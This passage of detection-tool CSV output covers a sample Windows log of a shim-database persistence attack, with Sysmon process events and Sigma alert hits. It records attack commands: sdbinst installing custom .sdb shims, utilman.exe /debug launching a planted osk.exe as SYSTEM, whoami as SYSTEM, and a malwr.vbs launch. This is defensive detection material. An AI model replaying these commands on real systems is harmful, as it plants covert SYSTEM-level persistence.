utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application 
Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application 
Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 
ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process 
Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\wsqmcons.exe 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb : Path: C:\Windows\System32\rundll32.exe : User: 
EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" : Path: C:\Program Files\Windows NT\Accessories\wordpad.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k 
GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe : Path: C:\Windows\servicing\TrustedInstaller.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c 
,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
